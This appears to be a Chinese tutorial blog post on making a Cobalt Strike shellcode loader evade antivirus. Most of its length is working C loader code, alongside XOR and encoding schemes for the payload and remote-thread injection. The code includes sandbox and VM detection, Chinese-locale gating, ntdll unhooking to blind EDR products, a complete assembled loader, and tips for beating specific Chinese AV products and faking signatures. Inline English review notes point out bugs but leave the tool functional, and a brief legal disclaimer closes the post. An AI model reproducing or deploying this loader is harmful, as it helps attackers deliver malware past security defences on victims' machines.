【Web实战】先锋马免杀分享
先锋马免杀技术详解
一、Shellcode自身免杀技术
1. Shellcode加密与编码方法
- 常见加密/编码方式:
- 编码方式:Base64、SGN编码
- 加密方式:XOR、RC4、UUID(注意:RC4 早已被视为弱密码算法,这里和 XOR 一样只起改变静态特征的混淆作用,并非“强加密”;UUID 化本质上是把 shellcode 字节转成 UUID 字符串再还原,属于编码而非加密)
- 010 Editor XOR加密实践:
- 使用010 Editor打开CS生成的bin文件
- 选择XOR加密功能
- 设置XOR密钥(示例使用0x39,必须与加载器中解密时使用的密钥一致)
- 保存加密后的bin文件
- 推荐加密组合:
- XOR双加密(注意:用两个单字节密钥先后异或,等价于用 key1^key2 做一次异或,并不增加任何强度,只是改变了密文字节)
- XOR加密 + SGN编码
- XOR加密 + Base64编码
- UUID + Base64编码
二、Shellcode加载方式详解
1. 指针直接执行
#include <Windows.h>
#include <stdio.h>
/*
 * Method 1: call a global byte array directly as a function.
 * "shellcode" is a placeholder string literal standing in for the raw payload
 * bytes; as written, the call would execute the ASCII bytes of the literal,
 * which is not meaningful code. Whether this runs at all depends on the
 * array's section being executable: a non-const global lands in a writable
 * data section, which is normally not executable under DEP (the
 * "/section:.data,RWE" linker option further down is the post's answer to that).
 */
unsigned char shellcodeloader[] = "shellcode";
int main()
{
/* Cast the array's address to a no-argument function pointer and call it. */
((void(*)(void)) & shellcodeloader)();
}
2. 申请内存执行
#include <Windows.h>
#include <stdio.h>
/*
 * Method 2: copy the bytes into a freshly VirtualAlloc'd region and call it.
 * The region is requested as PAGE_EXECUTE_READWRITE (RWX) in a single step.
 * Review notes: the VirtualAlloc result is not checked (NULL on failure would
 * make the memcpy fault); sizeof shellcode includes the literal's trailing NUL;
 * the region is never released (the process exits right after the call).
 */
int main()
{
char shellcode[] = "shellcode";  /* placeholder for the payload bytes */
void* run = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(run, shellcode, sizeof shellcode);
((void(*)())run)();
}
3. 资源加载Shellcode(推荐方式)
关键API函数:
- FindResource:定位资源位置
- SizeofResource:获取资源大小
- LoadResource:加载资源到内存
完整实现代码:
/*
 * Method 3 (fragment, meant to sit inside a function): locate the payload
 * stored as a resource inside the executable. IDR_PAYLOAD_BIN1 comes from
 * resource.h; L"PAYLOAD_BIN" is the custom resource type name given when the
 * .bin file is imported into the project.
 * None of the three calls is checked for failure here. oldProtect and pt are
 * declared for the VirtualProtect step that the full listing below performs;
 * the HGLOBAL from LoadResource is used directly as a pointer to the bytes.
 */
DWORD oldProtect;
BOOL pt;
HRSRC shellcodeResource = FindResource(NULL, MAKEINTRESOURCE(IDR_PAYLOAD_BIN1), L"PAYLOAD_BIN");
HGLOBAL shellcodeResourceData = LoadResource(NULL, shellcodeResource);
DWORD shellcodeSize = SizeofResource(NULL, shellcodeResource);
4. 无API加载Shellcode
/*
 * Method 4: place the bytes in the .text section at compile time
 * (MSVC #pragma section / __declspec(allocate)), so they are already
 * executable and no memory API is called. The empty braces are a placeholder
 * for the byte list; an empty initializer is accepted by C++ (and C23) but is
 * not valid C11. Because .text is normally not writable, the bytes cannot be
 * decoded in place with this approach.
 */
#pragma section(".text")
__declspec(allocate(".text")) char goodcode[] = { };
int main()
{
/* Cast the array's address to a function pointer and call it. */
((void(*)())(&goodcode))();
}
5. 设置data段可执行
#include <Windows.h>
/*
 * Method 5: keep the bytes in .data but have the linker mark that section
 * readable/writable/executable (MSVC linker directive). Empty braces are a
 * placeholder for the byte list. Note that an RWE section is a static
 * property recorded in the PE section header, visible to any file scanner.
 */
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] = { };
int main()
{
/* Cast the array's address to a function pointer and call it. */
((void(*)())(void*)shellcode)();
}
6. 远程线程注入
关键API函数:
- OpenProcess:打开远程进程句柄
- VirtualAllocEx:在远程进程分配内存
- WriteProcessMemory:写入Shellcode到远程内存
- CreateRemoteThread:创建远程线程执行Shellcode
完整实现代码:
#include <Windows.h>
#include <stdio.h>
/*
 * Method 6: remote-thread injection into a process given by PID on the
 * command line. Sequence: OpenProcess -> VirtualAllocEx (RWX) ->
 * WriteProcessMemory -> CreateRemoteThread starting at the buffer address.
 * Review notes:
 *  - argv[1] is used without checking argc; with no argument this passes NULL
 *    to atoi (undefined behaviour). strtoul with validation would be safer.
 *  - No return value is checked: if OpenProcess fails, the later calls run
 *    with an invalid handle and fail silently.
 *  - PROCESS_ALL_ACCESS is more than these four calls require.
 *  - The thread handle returned by CreateRemoteThread is never closed.
 */
int main(int argc, char* argv[])
{
unsigned char shellcode[] = {};  /* placeholder for the payload bytes */
HANDLE processHandle;
HANDLE remoteThread;
PVOID remoteBuffer;
processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode,
(MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
remoteThread = CreateRemoteThread(processHandle, NULL, 0,
(LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
CloseHandle(processHandle);
return 0;
}
7. RW+RX内存技术
实现步骤:
- 使用 VirtualAlloc 申请 RW 内存
- 使用 memcpy 拷贝 Shellcode
- 使用 VirtualProtect 改为 RX 权限
- 执行 Shellcode
实现代码:
#include <Windows.h>
/*
 * Method 7: allocate read/write, copy, then flip to read/execute so that no
 * RWX region is ever mapped. 0x04 is the numeric value of PAGE_READWRITE and
 * 0x20 of PAGE_EXECUTE_READ; the named macros (used in the final listing) are
 * clearer than the magic numbers.
 * Review notes: buf is an empty placeholder, so sizeof(buf) is 0 and a
 * zero-byte VirtualAlloc is expected to fail; neither the VirtualAlloc result
 * nor pt (the VirtualProtect result) is checked before the call.
 */
int main() {
int shellcode_size = 0;
BOOL pt;
DWORD oldProtect;
unsigned char buf[] = { };
shellcode_size = sizeof(buf);
LPVOID shellcode = VirtualAlloc(NULL, shellcode_size, MEM_COMMIT, 0x04);
CopyMemory(shellcode, buf, shellcode_size);
pt = VirtualProtect(shellcode, shellcode_size, 0x20, &oldProtect);
((void(*)())shellcode)();
}
三、反沙箱技术
1. 沙箱检测方法
- 系统运行时间检测:
/* Sandbox check (fragment, meant to sit inside a function): GetTickCount
 * returns milliseconds since boot as a 32-bit value (it wraps after ~49.7
 * days). Exit if the machine has been up for less than 10 minutes (600000 ms). */
ULONG uptime = GetTickCount();
if (uptime < 10 * 60 * 1000) { // less than 10 minutes
exit(1);
}
- 进程数量检测:
/*
 * Sandbox check: count running processes via a Toolhelp snapshot and exit if
 * there are 60 or fewer (the condition is <=, not <).
 * Review notes: the snapshot handle is never closed, and an
 * INVALID_HANDLE_VALUE return is not checked (Process32First then fails,
 * num stays 0, and the process exits as if it were sandboxed).
 */
void BypassSimulation()
{
HANDLE snapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe = { sizeof(pe) };
int num = 0;
for (BOOL ret = Process32First(snapShot, &pe); ret; ret = Process32Next(snapShot, &pe))
{
num++;
}
if (num <= 60) // 60 or fewer processes
{
exit(1);
}
}
- 语言环境检测:
/*
 * Locale gate: exit unless the user's default UI language has Chinese as its
 * primary language ID; returns 0 when the check passes. Note this reads the
 * UI language only, not the system locale or keyboard layout.
 */
int check() {
LANGID langId = GetUserDefaultUILanguage();
if (PRIMARYLANGID(langId) != LANG_CHINESE)
{
exit(1);
}
return 0;
}
- 虚拟机检测:
/*
 * VM check: walk the process list and return false if any of the four
 * VMware-related process names is running, true otherwise (so true means
 * "no VMware process seen").
 * Review notes:
 *  - "vmwaretrat.exe" looks like a typo (presumably "vmwaretray.exe"); as
 *    written that entry can never match. It is a runtime string, so it is
 *    left unchanged here.
 *  - szExeFile is converted with WideCharToMultiByte, so this assumes a
 *    UNICODE build; the strcmp comparison is case-sensitive.
 *  - The snapshot handle is never closed, and its validity is not checked.
 */
bool CheckProcess() {
const char* list[4] = { "vmtoolsd.exe","vmwaretrat.exe","vmwareuser.exe","vmacthlp.exe" };
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(pe32);
HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
BOOL bResult = Process32First(hProcessSnap, &pe32);
while (bResult) {
char ss_Name[MAX_PATH] = { 0 };
/* Narrow the wide executable name with the ANSI code page for strcmp. */
WideCharToMultiByte(CP_ACP, 0, pe32.szExeFile, -1, ss_Name, sizeof(ss_Name), NULL, NULL);
for (int i = 0; i < 4; i++) {
if (strcmp(ss_Name, list[i]) == 0)
return false;
}
bResult = Process32Next(hProcessSnap, &pe32);
}
return true;
}
四、EDR对抗技术
1. 清除NTDLL Hook
实现原理:
- 从磁盘加载干净的ntdll.dll
- 覆盖内存中被Hook的.text段(注意:读取磁盘上的 ntdll.dll 并改写内存中 ntdll 的 .text,这一行为本身也是可被监控的特征)
完整实现代码:
/*
 * Replace the in-memory .text section of ntdll.dll with the copy on disk,
 * to remove inline hooks placed there by security products. Always returns 0.
 * Steps: take the loaded module's base via GetModuleInformation on the
 * current-process pseudo-handle HANDLE(-1); map the on-disk file with
 * SEC_IMAGE so its sections sit at their virtual addresses (which is why
 * VirtualAddress can be used as an offset into the mapping); walk the loaded
 * module's section table; for ".text", make the range writable, memcpy
 * VirtualSize bytes from the mapping, then restore the previous protection.
 * Review notes:
 *  - CreateFileA, CreateFileMapping and MapViewOfFile results are not checked;
 *    a failure leads to dereferencing an invalid mapping address.
 *  - The view is never released with UnmapViewOfFile.
 *  - FreeLibrary is unbalanced: GetModuleHandleA does not add a reference.
 *  - The copy is byte-for-byte with no relocation handling, and the compare
 *    treats the 8-byte section Name field as a NUL-terminated string.
 *  - The path is hard-coded to c:\windows\system32 rather than derived from
 *    the system directory.
 */
DWORD UNHOOKntdll() {
MODULEINFO mi = {};
HMODULE ntdllModule = GetModuleHandleA("ntdll.dll");
GetModuleInformation(HANDLE(-1), ntdllModule, &mi, sizeof(mi));
LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll;
HANDLE ntdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll",
GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
/* SEC_IMAGE maps the file laid out as a loaded image, not as flat file bytes. */
HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL,
PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0);
PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew);
for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++) {
PIMAGE_SECTION_HEADER hookedSectionHeader =
(PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader)
+ ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));
if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) {
DWORD oldProtection = 0;
/* Temporarily RWX so the section bytes can be overwritten. */
VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress),
hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
memcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress),
(LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress),
hookedSectionHeader->Misc.VirtualSize);
/* Put the original protection back; the loop keeps scanning after .text. */
VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress),
hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection);
}
}
CloseHandle(ntdllFile);
CloseHandle(ntdllMapping);
FreeLibrary(ntdllModule);
return 0;
}
五、完整实现方案
1. 资源加载型Shellcode执行器
完整代码:
#include <Windows.h>
#include <wincrypt.h>
#include <string.h>
#include <stdlib.h>
#include <winreg.h>
#include <tlhelp32.h>
#include <time.h>
#include "resource.h"
#include <io.h>
#pragma comment(lib, "Crypt32.lib")
#include <psapi.h>
#include <iostream>
#include <stdio.h>
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
// 此处包含上述UNHOOKntdll()、BypassSimulation()、check()等函数
/*
 * Entry point of the resource-loading executor. Order: process-count,
 * UI-language and uptime gates (each calls exit(1) when it fails), ntdll
 * unhooking, then resource lookup, copy into an RW region, single-byte XOR
 * decode with 0x39 (the key used in the 010 Editor step), flip to RX, call.
 * Review notes: the FindResource/LoadResource/VirtualAlloc results and pt are
 * not checked; the loop compares int i against DWORD shellcodeSize (mixed
 * signedness); argc/argv are unused; the /subsystem:windows pragma above
 * suppresses the console window while keeping main as the entry function.
 */
int main(int argc, char* argv[])
{
// Anti-sandbox checks
BypassSimulation();
check();
ULONG uptime = GetTickCount();
if (uptime < 10 * 60 * 1000) {
exit(1);
}
// Remove EDR hooks from ntdll
UNHOOKntdll();
DWORD oldProtect;
BOOL pt;
// Load and execute the encrypted shellcode resource
HRSRC shellcodeResource = FindResource(NULL, MAKEINTRESOURCE(IDR_PAYLOAD_BIN1), L"PAYLOAD_BIN");
HGLOBAL shellcodeResourceData = LoadResource(NULL, shellcodeResource);
DWORD shellcodeSize = SizeofResource(NULL, shellcodeResource);
LPSTR shell = (LPSTR)VirtualAlloc(0, shellcodeSize, MEM_COMMIT, PAGE_READWRITE);
memcpy(shell, shellcodeResourceData, shellcodeSize);
// XOR decrypt (key must match the one used when encrypting)
for (int i = 0; i < shellcodeSize; i++) {
shell[i] ^= 0x39;
}
/* RW -> RX: the decoded bytes remain readable in this region after the call. */
pt = VirtualProtect(shell, shellcodeSize, PAGE_EXECUTE_READ, &oldProtect);
((void(*)())shell)();
return 0;
}
2. VS项目配置要点
- 编译配置:
- 设置为Release模式
- 平台选择x86(生成的 shellcode/bin 文件的架构必须与加载器一致)
- 代码生成设置为MT(静态链接运行时库)
- 资源文件添加:
- 在资源视图中添加资源
- 导入加密后的bin文件
- 重命名为PAYLOAD_BIN类型
- 数字签名对抗:
- 添加图标和版本信息
- 使用伪造的数字签名(仅对个别只检查“是否带签名”而不做证书链校验的产品有效;伪造的签名无法通过 Authenticode 验证,且伪造/盗用签名本身存在法律风险)
六、注意事项
- 对抗环境选择:
- 火绒环境:可尝试进程/线程注入
- 某数字杀软晶核环境:避免注入,推荐直接执行或注入自身进程
- 免杀效果维持:
- 定期更换加密密钥和组合方式
- 根据目标环境调整反沙箱策略
- 保持代码混淆和变种
- 法律风险提示:
- 本技术文档仅供安全研究学习使用
- 实际使用需获得合法授权
- 未经授权使用可能涉及法律风险